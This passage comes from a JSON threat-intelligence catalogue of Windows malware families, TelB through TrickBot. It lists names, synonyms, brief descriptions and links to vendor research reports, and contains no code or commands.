"uuid": "daf2f70b-205e-4b39-89a6-d382ded4c33c", "value": "TelB" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", "https://www.secureworks.com/research/threat-profiles/iron-viking", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", "value": "TeleBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", "https://www.secureworks.com/research/threat-profiles/iron-viking", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", "value": "TeleDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" ], "synonyms": [], "type": [] }, "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", "value": "Tempedreve" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf" ], "synonyms": [ "Fakem RAT" ], "type": [] }, "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", "value": "Terminator RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite", "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", "https://www.alienvault.com/blogs/labs-research/internet-of-termites" ], "synonyms": [], "type": [] }, "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d", "value": "Termite" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [], "type": [] }, "uuid": "8036e023-c765-4bd6-828f-1c8d20987843", "value": "TerraPreter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader", "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" ], "synonyms": [], "type": [] }, "uuid": "ddfda5dc-a416-4cf3-b734-6aa083aa9e04", "value": "TerraLoader" }, { "description": "According to QuoINT TerraRecon is a reconnaissance tool, looking for a specific piece of hardware and software targeting retail and payment services sectors. Attributed to Golden Chickens.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [ "Taurus Loader Reconnaissance Module" ], "type": [] }, "uuid": "d8efa615-87bf-4477-8261-316215c0b637", "value": "TerraRecon" }, { "description": "According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting for example email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer", "https://github.com/eset/malware-ioc/tree/master/evilnum", "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", "https://twitter.com/3xp0rtblog/status/1275746149719252992" ], "synonyms": [ "SONE", "StealerOne", "Taurus Loader Stealer Module" ], "type": [] }, "uuid": "d5c9a697-c7bf-4e13-8c2e-c74465e77208", "value": "TerraStealer" }, { "description": "TerraTV is a custom DLL designed to hijack legit TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to Golden Chickens malware as a service group.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [ "Taurus Loader TeamViewer Module" ], "type": [] }, "uuid": "0597af12-88d2-4289-a154-191774e3f48d", "value": "TerraTV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", "https://blogs.cisco.com/security/talos/teslacrypt", "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/", "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", "https://community.riskiq.com/article/30f22a00", "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack", "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/" ], "synonyms": [ "cryptesla" ], "type": [] }, "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", "value": "TeslaCrypt" }, { "description": "TFlower is a new ransomware targeting mostly corporate networks discovered in August, 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware will conduct a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware also will terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extention to encrypted files, but prepends the marker \"*tflower\" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower", "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign", "https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/", "https://www.sygnia.co/mata-framework" ], "synonyms": [], "type": [] }, "uuid": "bd5d0ff1-7bd1-4f8d-bf66-4d02f8e68dd2", "value": "TFlower Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" ], "synonyms": [ "Alphabot" ], "type": [] }, "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", "value": "Thanatos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/" ], "synonyms": [], "type": [] }, "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", "value": "Thanatos Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thinmon", "https://mp.weixin.qq.com/s/nyxZFXgrtm2-tBiV3-wiMg" ], "synonyms": [], "type": [] }, "uuid": "a416e88b-8fc0-41a9-bb2e-13cbcc5f22b0", "value": "ThinMon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", "value": "ThreeByte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", "value": "ThumbThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx", "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html", "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/", "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/" ], "synonyms": [ "Ranzy Locker" ], "type": [] }, "uuid": "e4be8d83-748e-46df-8dd7-0ce1b2255f36", "value": "ThunderX Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" ], "synonyms": [], "type": [] }, "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", "value": "Thunker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/" ], "synonyms": [], "type": [] }, "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", "value": "Tidepool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", "https://adalogics.com/blog/the-state-of-advanced-code-injections", "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan", "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", "http://garage4hackers.com/entry.php?b=3086", "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html" ], "synonyms": [ "Illi", "TinyBanker", "Zusy" ], "type": [] }, "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", "value": "Tinba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [], "type": [] }, "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, { "description": "TinyMet is a meterpreter stager.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", "https://github.com/SherifEldeeb/TinyMet", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://twitter.com/VK_Intel/status/1273292957429510150", "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "TiniMet" ], "type": [] }, "uuid": "075c6fa0-e670-4fe1-be8b-b8b13714cb58", "value": "TinyMet" }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", "https://krebsonsecurity.com/tag/nuclear-bot/" ], "synonyms": [ "MicroBankingTrojan", "Nuclear Bot", "NukeBot", "Xbot" ], "type": [] }, "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", "value": "TinyNuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign" ], "synonyms": [], "type": [] }, "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", "value": "TinyTyphon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", "value": "TinyZbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" ], "synonyms": [], "type": [] }, "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", "value": "Tiop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger", "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://vblocalhost.com/uploads/VB2020-20.pdf", "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" ], "synonyms": [ "LuckyBack" ], "type": [] }, "uuid": "8d7108fe-65be-4853-945d-1d5376dbaa34", "value": "Tmanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" ], "synonyms": [ "Gheg" ], "type": [] }, "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", "value": "Tofsee" }, { "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" ], "synonyms": [], "type": [] }, "uuid": "77e29e3a-d4a3-4692-b1f8-38ad6dc1af1d", "value": "TONEDEAF" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonnerre", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", "https://research.checkpoint.com/2021/after-lightning-comes-thunder/" ], "synonyms": [], "type": [] }, "uuid": "a7590aa5-d9fb-449f-8a5e-5233077b736e", "value": "Tonnerre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma", "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", "http://blog.nsfocus.net/stumbzarus-apt-lazarus/" ], "synonyms": [], "type": [] }, "uuid": "69860c07-2acb-4674-8e68-41a1d8fe958a", "value": "Torisma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" ], "synonyms": [ "Teerac" ], "type": [] }, "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", "value": "TorrentLocker" }, { "description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.gdatasoftware.com/blog/trat-control-via-smartphone", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns" ], "synonyms": [], "type": [] }, "uuid": "b9e6e4bd-57e8-44e7-853c-8dcb83c26079", "value": "tRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html", "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", "http://adelmas.com/blog/treasurehunter.php" ], "synonyms": [ "huntpos" ], "type": [] }, "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", "value": "TreasureHunter" }, { "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\n2017 - Trickbot primarily uses Necurs as vehicle for installs.\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\nQ3/4 2018 - Trickbot starts being spread through Emotet.\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Macro enabled > Trickbot installed", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/", "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/", "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", "https://labs.vipre.com/trickbots-tricks/", "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/", "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor", "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737", "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://twitter.com/anthomsec/status/1321865315513520128", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/", "https://blog.talosintelligence.com/2020/03/trickbot-primer.html", "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/", "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/", "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf", "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf", "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/", "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/", "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet", "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf", "https://www.intrinsec.com/deobfuscating-hunting-ostap/", "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass", "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html", "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html", "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://www.youtube.com/watch?v=lTywPmZEU1A", "https://www.secureworks.com/research/threat-profiles/gold-blackburn", "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure", "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/", "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/", "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html", "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", "https://cofenselabs.com/all-you-need-is-text-second-wave/", "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/", "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", "https://www.netscout.com/blog/asert/dropping-anchor", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", 